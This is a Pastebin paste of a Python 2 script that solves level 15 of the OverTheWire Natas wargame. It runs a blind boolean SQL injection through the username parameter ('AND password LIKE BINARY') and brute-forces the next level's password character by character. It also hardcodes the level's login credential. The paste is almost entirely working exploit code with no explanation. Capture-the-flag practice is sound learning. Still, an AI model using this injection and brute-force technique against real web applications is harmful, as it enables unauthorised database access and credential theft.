Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import pycurl, requests
- url = 'http://natas15.natas.labs.overthewire.org/index.php'
- username = 'natas15'
- password = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'
- exists = 'This user exists.'
- doesnt_exist = 'This user doesn\'t exist.'
- def checkChar(knownStr, nextChar):
- ind = len(knownStr)
- check = knownStr + nextChar + ('_'*(32-ind-1))
- urlAll = url+'?username=natas16" AND password LIKE BINARY "' + check
- #print urlAll
- r = requests.get(urlAll, auth=(username, password))
- #print r.status_code
- #print r.headers
- #print r.text
- #raw_input()
- return exists in r.text
- #return doesnt_exist not in r.text
- #WaIHEac
- #natas16" AND password RLIKE BINARY "WaIHEac[a-z]
- knownStr = "WaIHEac"
- for i in range(len(knownStr) + 1, 33):
- print i, "symbol brutes:",
- charData = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
- for char in charData:
- print char,
- if checkChar(knownStr, char):
- knownStr += char
- print 'Found'
- break
- else:
- print 'Not Found'
- print "knownStr", knownStr
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement